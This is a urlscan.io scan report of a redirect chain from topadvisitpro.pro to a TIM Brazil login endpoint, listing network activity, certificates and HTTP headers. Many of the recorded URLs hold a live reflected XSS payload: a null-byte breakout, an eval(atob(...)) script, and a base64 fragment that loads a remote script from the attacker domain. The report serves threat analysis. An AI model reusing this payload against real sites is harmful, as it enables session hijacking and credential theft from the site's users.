auth3.tim.com.br Open in urlscan Pro
45.60.63.22 Public Scan

Go To Rescan
Add Verdict Report

Submitted URL:
http://topadvisitpro.pro/lion/185fsdg/start.php
Effective URL:
http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F...
Submission: On February 01 via api (February 1st 2024, 9:31:40 pm UTC) from US — Scanned from US

Summary HTTP 33 Redirects Behaviour Indicators

Summary

This website contacted 11 IPs in 3 countries across 10 domains to perform 33 HTTP transactions. The main IP is 45.60.63.22, located in United States and belongs to INCAPSULA, US. The main domain is auth3.tim.com.br.

This is the only time auth3.tim.com.br was scanned on urlscan.io!

urlscan.io Verdict: No classification

Domain & IP information

	IP Address	AS Autonomous System
1 2	45.90.56.13 45.90.56.13	204957 (GREENFLOI...) (GREENFLOID-AS)
10	45.60.63.22 45.60.63.22	19551 (INCAPSULA) (INCAPSULA)
4	2607:f8b0:400... 2607:f8b0:4004:c17::61	15169 (GOOGLE) (GOOGLE)
2	91.241.94.8 91.241.94.8	49582 (UPSTREAM-...) (UPSTREAM-AS Greece)
5	3.212.81.97 3.212.81.97	14618 (AMAZON-AES) (AMAZON-AES)
1	91.220.208.18 91.220.208.18	49582 (UPSTREAM-...) (UPSTREAM-AS Greece)
2	2607:f8b0:400... 2607:f8b0:4004:c06::8b	15169 (GOOGLE) (GOOGLE)
2	2001:4860:480... 2001:4860:4802:36::181	15169 (GOOGLE) (GOOGLE)
2	2607:f8b0:400... 2607:f8b0:4004:c09::9b	15169 (GOOGLE) (GOOGLE)
1	2607:f8b0:400... 2607:f8b0:4004:c08::68	15169 (GOOGLE) (GOOGLE)
33	11

2 45.90.56.13 (Geneva, Switzerland) 1 redirects

ASN204957 (GREENFLOID-AS, US)
PTR: mon-fri.gg

topadvisitpro.pro	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

10 45.60.63.22 (United States)

ASN19551 (INCAPSULA, US)

auth3.tim.com.br	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

4 2607:f8b0:4004:c17::61 (Washington, United States)

ASN15169 (GOOGLE, US)

www.googletagmanager.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 91.241.94.8 (Greece)

ASN49582 (UPSTREAM-AS Greece, GR)

www.timpromos.com.br	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

5 3.212.81.97 (Ashburn, United States)

ASN14618 (AMAZON-AES, US)
PTR: ec2-3-212-81-97.compute-1.amazonaws.com

tim.jokeridea.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 91.220.208.18 (Greece)

ASN49582 (UPSTREAM-AS Greece, GR)

analytics-br-tim.securewebfraud.io	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 2607:f8b0:4004:c06::8b (Washington, United States)

ASN15169 (GOOGLE, US)

www.google-analytics.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 2001:4860:4802:36::181 (United States)

ASN15169 (GOOGLE, US)

analytics.google.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 2607:f8b0:4004:c09::9b (Ashburn, United States)

ASN15169 (GOOGLE, US)

stats.g.doubleclick.net	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2607:f8b0:4004:c08::68 (Ashburn, United States)

ASN15169 (GOOGLE, US)

www.google.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

	Apex Domain Subdomains	Transfer
10	tim.com.br auth3.tim.com.br	80 KB
5	jokeridea.com tim.jokeridea.com	7 KB
4	googletagmanager.com www.googletagmanager.com — Cisco Umbrella Rank: 37	264 KB
3	google.com analytics.google.com — Cisco Umbrella Rank: 154 www.google.com — Cisco Umbrella Rank: 2	716 B
2	doubleclick.net stats.g.doubleclick.net — Cisco Umbrella Rank: 79	394 B
2	google-analytics.com www.google-analytics.com — Cisco Umbrella Rank: 27	21 KB
2	timpromos.com.br www.timpromos.com.br	47 KB
2	topadvisitpro.pro 1 redirects topadvisitpro.pro	6 KB
1	securewebfraud.io analytics-br-tim.securewebfraud.io	332 B
0	dindo.com.br Failed wap.dindo.com.br Failed
33	10

	Domain	Requested by
10	auth3.tim.com.br	auth3.tim.com.br
5	tim.jokeridea.com	auth3.tim.com.br tim.jokeridea.com
4	www.googletagmanager.com	auth3.tim.com.br www.googletagmanager.com
2	stats.g.doubleclick.net	www.googletagmanager.com www.google-analytics.com
2	analytics.google.com	www.googletagmanager.com
2	www.google-analytics.com	www.googletagmanager.com www.google-analytics.com
2	www.timpromos.com.br	auth3.tim.com.br
2	topadvisitpro.pro	1 redirects auth3.tim.com.br
1	www.google.com	topadvisitpro.pro
1	analytics-br-tim.securewebfraud.io
0	wap.dindo.com.br Failed	auth3.tim.com.br
33	11

This site contains no links.

Subject Issuer	Validity	Valid
auth3.tim.com.br DigiCert Global G2 TLS RSA SHA256 2020 CA1	`2023-04-19` - `2024-04-18`	a year	crt.sh
*.google-analytics.com GTS CA 1C3	`2024-01-09` - `2024-04-02`	3 months	crt.sh
tim.jokeridea.com R3	`2023-12-19` - `2024-03-18`	3 months	crt.sh
*.google.com GTS CA 1C3	`2024-01-09` - `2024-04-02`	3 months	crt.sh
*.g.doubleclick.net GTS CA 1C3	`2024-01-09` - `2024-04-02`	3 months	crt.sh
www.google.com GTS CA 1C3	`2024-01-09` - `2024-04-02`	3 months	crt.sh

This page contains 5 frames:

Frame: https://www.google.com/
Frame ID: 4432573ADBD20C37267512DD0D2CC4D0
Requests: 24 HTTP requests in this frame

Frame: https://wap.dindo.com.br/newMobile/auth/tim/header.aspx?s=25
Frame ID: B1010A621C2A1687D5DC68240DA5795D
Requests: 1 HTTP requests in this frame

Frame: https://auth3.tim.com.br/OTP/css/TIM-Login-styles-sheet.css
Frame ID: 6BC6ABA61167C068E9D6E529F01F881A
Requests: 4 HTTP requests in this frame

Frame: https://tim.jokeridea.com/vr/header.aspx
Frame ID: 269093FB2FAAD3F023D843BB0DA3867D
Requests: 1 HTTP requests in this frame

Frame: https://tim.jokeridea.com/vr/footer.aspx
Frame ID: 5BBE342CD1C371BC31C1A0844B048211
Requests: 3 HTTP requests in this frame

Screenshot
Live screenshot

Full Image

Page URL History Show full URLs

http://topadvisitpro.pro/lion/185fsdg/start.php HTTP 301
http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982F... Page URL

Detected technologies

Google Analytics (Analytics) Expand

Overall confidence: 100%
Detected patterns

google-analytics\.com/(?:ga|urchin|analytics)\.js

Google Tag Manager (Tag Managers) Expand

Overall confidence: 100%
Detected patterns

googletagmanager\.com/gtm\.js
googletagmanager\.com/gtag/js

jQuery (JavaScript Libraries) Expand

Overall confidence: 100%
Detected patterns

jquery.*\.js(?:\?ver(?:sion)?=([\d.]+))?

Page Statistics

33
Requests

76 %
HTTPS

50 %
IPv6

10
Domains

11
Subdomains

11
IPs

3
Countries

424 kB
Transfer

1239 kB
Size

11
Cookies

0 Outgoing links

These are links going to different origins than the main page.

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

http://topadvisitpro.pro/lion/185fsdg/start.php HTTP 301
http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2 Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

Request Chain 31

https://google.com/ HTTP 301
https://www.google.com/

33 HTTP transactions
0 data transactions

Method
Protocol Status Resource
Path Size
x-fer Time
Latency Type
MIME-Type IP
Location

GET
H/1.1

200
OK

Primary Request heloading Show response
auth3.tim.com.br/v3/accesscontrol-web/
Redirect Chain

http://topadvisitpro.pro/lion/185fsdg/start.php
http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&en...

14 KB
4 KB

457ms
409ms

Document
text/html

45.60.63.22
INCAPSULA

General

Check archive.org

Show headers Download Go to

Full URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol: HTTP/1.1
Server: 45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software: Apache /
Resource Hash: 3c950db6b1d1888ee9e00411adc4c63735731a4ee2b3db9d2f7fc44f26cefbf9

Request headers

Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36
accept-language: en-US,en;q=0.9

Response headers

Connection: Keep-Alive
Content-Encoding: gzip
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Date: Thu, 01 Feb 2024 21:31:34 GMT
Keep-Alive: timeout=4, max=1500
Server: Apache
Transfer-Encoding: chunked
X-CDN: Imperva
X-Iinfo: 12-24097127-24097130 NNYN CT(149 -1 0) RT(1706823093630 11) q(0 0 2 1) r(3 3) U24

Redirect headers

Connection: Keep-Alive
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Date: Thu, 01 Feb 2024 21:31:33 GMT
Keep-Alive: timeout=5, max=100
Location: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs=
Server: Apache/2.4.38 (Debian)

GET
H2 200 TIM-Login-styles-sheet.css
auth3.tim.com.br/OTP/css/ 21 KB
4 KB 748ms
644ms Stylesheet
text/css 45.60.63.22
INCAPSULA

General

Check archive.org

Show headers Download Go to

Full URL: https://auth3.tim.com.br/OTP/css/TIM-Login-styles-sheet.css
Requested by: Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software: Apache /
Resource Hash: 38b82be8dc970bd32e5651b51b46d5c5bdd81a1766c035bbe022f1d00ac09fce

Request headers

accept-language: en-US,en;q=0.9
Referer: http://auth3.tim.com.br/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

date: Thu, 01 Feb 2024 21:31:34 GMT
content-encoding: gzip
last-modified: Thu, 04 May 2017 03:57:51 GMT
server: Apache
x-cdn: Imperva
etag: "428b8-539a-54eaac6d7edc0"
content-type: text/css
x-iinfo: 3-3722192-3722196 NNYN CT(149 302 0) RT(1706823094077 43) q(0 0 4 0) r(6 6) U24
x-incap-sess-cookie-hdr: s1QQLbNOdjB5J7ZiyEXDErYNvGUAAAAAxYE9yoZZlSIxzyZjLK4Y/Q==
accept-ranges: bytes

GET cns.css
wap.dindo.com.br/newMobile/auth/tim/ 0
0

GET
H2 200 jquery.min.js Show response
auth3.tim.com.br/OTP/js/ 95 KB
34 KB 1077ms
975ms Script
application/javascript 45.60.63.22
INCAPSULA

General

Check archive.org

Show headers Download Go to

Full URL: https://auth3.tim.com.br/OTP/js/jquery.min.js
Requested by: Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software: Apache /
Resource Hash: 668b046d12db350ccba6728890476b3efee53b2f42dbb84743e5e9f1ae0cc404

Request headers

accept-language: en-US,en;q=0.9
Referer: http://auth3.tim.com.br/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

date: Thu, 01 Feb 2024 21:31:35 GMT
content-encoding: gzip
last-modified: Tue, 13 Sep 2016 17:46:50 GMT
server: Apache
x-cdn: Imperva
etag: "f806a-17b8b-53c67327e7680"
content-type: application/javascript
x-iinfo: 3-3722192-3722198 NNYN CT(231 466 0) RT(1706823094077 48) q(0 0 7 -1) r(9 9) U24
x-incap-sess-cookie-hdr: lZxMcOmm1mR5J7ZiyEXDErcNvGUAAAAAqkgop8ElF616c3Y1dr41fA==
accept-ranges: bytes

GET
H2 200 jquery.mask.min.js Show response
auth3.tim.com.br/OTP/js/ 6 KB
3 KB 907ms
805ms Script
application/javascript 45.60.63.22
INCAPSULA

General

Check archive.org

Show headers Download Go to

Full URL: https://auth3.tim.com.br/OTP/js/jquery.mask.min.js
Requested by: Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software: Apache /
Resource Hash: e0ef803f8bb9cbe07f2407212c2422f87d48dbd08addb5bb994c5f485b2dcc6a

Request headers

accept-language: en-US,en;q=0.9
Referer: http://auth3.tim.com.br/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

date: Thu, 01 Feb 2024 21:31:35 GMT
content-encoding: gzip
last-modified: Mon, 12 Sep 2016 11:15:48 GMT
server: Apache
x-cdn: Imperva
etag: "42850-1788-53c4d9e356100"
content-type: application/javascript
x-iinfo: 3-3722192-3722201 PNYN RT(1706823094077 62) q(0 6 6 -1) r(7 7) U24
x-incap-sess-cookie-hdr: aE6DSTS+rWR5J7ZiyEXDErYNvGUAAAAAs9gmbVgRfhIF8NKBcfZtSg==
accept-ranges: bytes

GET
H2 200 jquery.bxslider.min.js Show response
auth3.tim.com.br/OTP/js/ 20 KB
6 KB 764ms
663ms Script
application/javascript 45.60.63.22
INCAPSULA

General

Check archive.org

Show headers Download Go to

Full URL: https://auth3.tim.com.br/OTP/js/jquery.bxslider.min.js
Requested by: Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software: Apache /
Resource Hash: 646de1820a3f0a81b2aa7ea26de561e5cbab36ef8430d7bb7b7f0ab024569b40

Request headers

accept-language: en-US,en;q=0.9
Referer: http://auth3.tim.com.br/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

date: Thu, 01 Feb 2024 21:31:34 GMT
content-encoding: gzip
last-modified: Mon, 12 Sep 2016 11:15:48 GMT
server: Apache
x-cdn: Imperva
etag: "f8074-4e4c-53c4d9e356100"
content-type: application/javascript
x-iinfo: 3-3722192-3722203 NNYN CT(149 304 0) RT(1706823094077 57) q(0 0 4 -1) r(6 6) U24
x-incap-sess-cookie-hdr: Np3NaeyAdlJ5J7ZiyEXDErYNvGUAAAAAhN9rBfokVGMV37mcyS4CRQ==
accept-ranges: bytes

GET
H2 200 bowser.js Show response
auth3.tim.com.br/OTP/js/ 9 KB
3 KB 752ms
653ms Script
application/javascript 45.60.63.22
INCAPSULA

General

Check archive.org

Show headers Download Go to

Full URL: https://auth3.tim.com.br/OTP/js/bowser.js
Requested by: Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software: Apache /
Resource Hash: 71928367deed25916c0de98665f5733b47e07ae048a79a0901a48fabb9876040

Request headers

accept-language: en-US,en;q=0.9
Referer: http://auth3.tim.com.br/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

date: Thu, 01 Feb 2024 21:31:34 GMT
content-encoding: gzip
last-modified: Thu, 12 Jan 2017 19:10:36 GMT
server: Apache
x-cdn: Imperva
etag: "1742ca-2219-545ea78dd8300"
content-type: application/javascript
x-iinfo: 3-3722192-3722199 NNYN CT(149 301 0) RT(1706823094077 44) q(0 0 4 8) r(6 6) U24
x-incap-sess-cookie-hdr: aOQ+EY3fG1J5J7ZiyEXDErYNvGUAAAAA374flLkYy3Pts6YTVWl6AQ==
accept-ranges: bytes

GET
H2 200 spinner.js Show response
auth3.tim.com.br/OTP/js/ 611 B
877 B 754ms
656ms Script
application/javascript 45.60.63.22
INCAPSULA

General

Check archive.org

Show headers Download Go to

Full URL: https://auth3.tim.com.br/OTP/js/spinner.js
Requested by: Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software: Apache /
Resource Hash: d8151845717c3ed76a8002136f43423e7efedc096b4f60eb7aefe62c65544eef

Request headers

accept-language: en-US,en;q=0.9
Referer: http://auth3.tim.com.br/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

date: Thu, 01 Feb 2024 21:31:34 GMT
content-encoding: gzip
last-modified: Wed, 05 Sep 2018 17:22:45 GMT
server: Apache
x-cdn: Imperva
etag: "428dc-263-5752305ca4340"
content-type: application/javascript
x-iinfo: 3-3722192-3722201 NNYN CT(148 303 0) RT(1706823094077 54) q(0 0 4 -1) r(6 6) U24
x-incap-sess-cookie-hdr: TlvhJJ7hnyZ5J7ZiyEXDErYNvGUAAAAAUtV4TyCfbcgq6moVRj9n3g==
accept-ranges: bytes

GET
H2 200 logClientV3.js Show response
auth3.tim.com.br/OTP/js/ 304 B
735 B 754ms
657ms Script
application/javascript 45.60.63.22
INCAPSULA

General

Check archive.org

Show headers Download Go to

Full URL: https://auth3.tim.com.br/OTP/js/logClientV3.js
Requested by: Host: auth3.tim.com.br
